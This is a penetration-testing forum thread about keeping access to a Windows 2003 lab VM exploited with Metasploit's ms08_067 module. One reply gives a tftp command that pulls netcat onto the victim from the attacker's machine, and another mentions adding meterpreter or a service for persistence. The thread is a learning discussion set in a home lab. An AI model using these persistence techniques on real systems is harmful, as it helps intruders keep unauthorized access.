Results 1 to 7 of 7

Thread: Maintaining access?

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default Maintaining access?

    Hi All,

    I recently started testing and playing around in a basic vmlab using BT4. I used metasploit to pop a vanilla w2k3sp2 box using the ms08_067 vul. My noob question is how would I maintain access to this box? There are obviously various ways of doing this but what I want it to upload netcat. Now w2k3 does have ftp but not tftp client, am I missing the point here?

    thanks!

  2. #2
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default Re: Maintaining access?

    Quote Originally Posted by s3arch View Post
    Hi All,

    I recently started testing and playing around in a basic vmlab using BT4. I used metasploit to pop a vanilla w2k3sp2 box using the ms08_067 vul. My noob question is how would I maintain access to this box? There are obviously various ways of doing this but what I want it to upload netcat. Now w2k3 does have ftp but not tftp client, am I missing the point here?

    thanks!
    There's an enitire module for maintaining access in the Metasploit Unleashed - Mastering the Framework course.

    Are you sure there is no tftp client in Windows? Suppose you enable the tftp server in BT. Luckily for you, there happens to be nc.exe for Windows located somewhere in your BT machine. Then it would be a good idea to copy it to your /tmp folder.

    From Windows open cmd and run:

    Code:
    tftp -i 192.168.1.1 GET nc.exe
    Change the IP ofcourse to your BT machine. Also note, what directory you are in when you first start cmd, as that's where the file will end up. Post back your results.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default Re: Maintaining access?

    Thanks for the reply. Tftp will work fine on a XP (victim) but not on 2003 standard as it does not have a build-in tftp client... Good Metasploit link, I will definitely have a read through there.

  4. #4
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default Re: Maintaining access?

    Quote Originally Posted by s3arch View Post
    Thanks for the reply. Tftp will work fine on a XP (victim) but not on 2003 standard as it does not have a build-in tftp client... Good Metasploit link, I will definitely have a read through there.
    I actually wasn't sure, so I walked out in the pouring rain to where my lab is (the garage)


  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default Re: Maintaining access?

    hehe, I'm totally stumped...
    Immagini allegate Immagini allegate

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Maintaining access?

    Uhh s3aarch did you enable the tftp server or configure it? You might need to do that.

  7. #7
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: Maintaining access?

    Even if it didn't have tftp (which as Lincoln just showed us it does), it does have ftp and such built in, which you can automate with files and special switches.

    Rather than just rely on nc, I prefer to either nc + meterpreter.exe (payload X > blah.exe) or make use of the service.

    One more reason to go do the offsec PWB course You learn a LOT in that
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Similar Threads

  1. Live USB Backtrack Version - Does it access the HDD?
    By LinuxNewbie in forum Beginners Forum
    Replies: 10
    Last Post: 04-17-2010, 11:06 AM
  2. How to connect to your phone via Bluetooth to access Internet
    By morning_wood in forum BackTrack Howtos
    Replies: 8
    Last Post: 03-15-2010, 04:14 PM
  3. access bt4 running in virtualbox via vnc
    By bl0tch in forum Beginners Forum
    Replies: 5
    Last Post: 01-17-2010, 06:43 AM
  4. Live USB install - hard drive access
    By ForTheUSSR in forum Beginners Forum
    Replies: 2
    Last Post: 01-17-2010, 02:26 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •